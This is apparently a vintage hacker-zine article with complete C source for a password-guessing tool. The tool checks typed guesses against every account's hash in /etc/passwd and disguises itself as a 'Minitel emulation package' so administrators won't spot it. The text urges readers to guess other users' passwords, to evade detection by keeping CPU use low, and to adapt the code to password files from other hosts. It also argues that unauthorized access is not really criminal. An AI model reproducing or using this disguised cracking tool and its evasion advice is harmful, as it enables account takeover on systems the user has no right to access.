UNIX Password Hacker

An Alternative Approach

by Keyboard Jockey

If you've been trying to hack UNIX for a while, I'm sure you've run into some form of a password hacker.  Most of these do the job, but I tend to avoid using them.  They use too much CPU time and are usually easy to spot.  In this article I will show you an alternative way of password hacking, using the same method as most others, but with a different approach.

In order for this program to work, check your /etc/passwd.  You will see account information, starting with username, followed by a colon, followed by an encrypted password, and a lot of other account information.  Any encrypted password that has a * in it cannot be logged into.  Also, if it seems a little short, like one digit, the system is probably using shadow passwords: the data in the encrypted password entry is not valid.  Hopefully it is valid or else this program will not work on it.

First, type in the source code, and then compile it.  If you're having problems with compiling, make sure you typed it in correctly.  If you're not sure about your compiler, look at the online manual entry of cc (C compiler).  After that, execute it and you will see:

Minitel emulation package V3.0 (C)opyright 1985-1990 Do you need relaxed protocol? (for networks)

At this point, you should enter: 800

This is so anyone else who is running it won't think it is a password hacker.  You might forget about the execute permissions or a superuser might be snooping around.  Anyway, it is safer this way than without it.

After entering 800, you will see Connect to what host?

It is actually asking you to enter a password.  It will then take a few seconds and scan everybody in /etc/passwd.  If it finds anyone with that password, you'll see the username on the screen.  The first time you do this, test it out by entering your own password and see if your username shows up.  It will keep asking you to enter passwords until you press Enter (all by itself).

Something you might want to do is to modify this program or make your own.  If you're going to make your own, look at the last few lines where it uses the crypt command.  If you're going to modify mine, you might want to make it so that it can accept external files, instead of using /etc/passwd.  In other words, hack accounts from another host.  Because most other scanners try all the words in the dictionary file, CPU usage is high.  With this one, there is a moment of high CPU usage (the scanning of /etc/passwd) and moments of low CPU usage (when you're entering your attempt).  Keep in mind that some systems keep track of how much CPU time you use, what program it was, and also how often you use Telnet.

When you're guessing at people's passwords, remember the password policy on your system.  Some systems have a 6-digit limit and the password can't be in the dictionary.  So don't waste time entering something like cpu when 3-digit passwords aren't allowed.  It will take a while to get an account.  After all, it is you who is guessing the passwords now.  The advantage is that it is hard to detect.  The disadvantage is that it takes up your time, not the computer's.

If you're looking for more information about UNIX structures, try the man pages or buy the book Using C on the UNIX System from O'Reilly & Associates, Inc.  You can get a catalog of their books by requesting one from nuts@ora.uu.net, at uunet!ora!nuts, or at O'Reilly & Associates, Inc., 981 Chestnut Street, Newton, MA 02164.

Now that you have enough knowledge to use this program, I'll end this article with some interesting questions and beliefs.

I think hacking is the use of creativity and knowledge to obtain a goal.  After all, if you're just using cookbook methods (like this program) then you're not really hacking.  If you have an account or a code but you don't understand how it was taken, then you didn't hack it.  Also, if you didn't destroy or pirate anything, why does the law consider you a criminal?  After all, most legal users of a system waste resources too.  Does it really matter if the CPU time was taken by Mr. Hacker, the guy who uses accounts to look around and hangup, or by Joe Blow, the guy who uses the same amount of CPU time to download new public domain games for his personal computer from another host?

And one last note, have people really been using viruses to hack?  Have people been using their skills to destroy the host after they've hacked it?  That is the impression I got from Good Morning America on ABC when they interviewed a former LOD/H member.  The only good example I can think of is Robert T. Morris, but his virus/worm was never meant to be destructive.

alternate.c:

/* Alternative UNIX Password Hacker Written by Keyboard Jockey */ #include <stdio.h> #include <pwd.h> #include <string.h> struct passwd *p1; struct passwd *getpwent(); char *crypt(); main() { char *pw, passw[20], thing[80], thing2[80]; strcpy(thing2, "800"); printf("\n\nMinitel emulation package V3.0\n"); printf("(C)opyright 1985-1990\n\n"); printf("Do you need relaxed protocol? (for networks) "); gets(thing); if (strcmp(thing, thing2) != 0) { sleep(1); printf("\nCan't find minitel data files.\n"); exit(1); } label1: setpwent(); printf("\nConnect to what host? "); gets(passw); if (strlen(passw) == 0) goto label2; while ((p1 = getpwent()) != NULL) { pw = crypt(passw, p1->pw_passwd); if (!strcmp(pw, p1->pw_passwd)) { printf("%s\n", p1->pw_name); } } goto label1; label2: exit(0); }

Code: alternate.c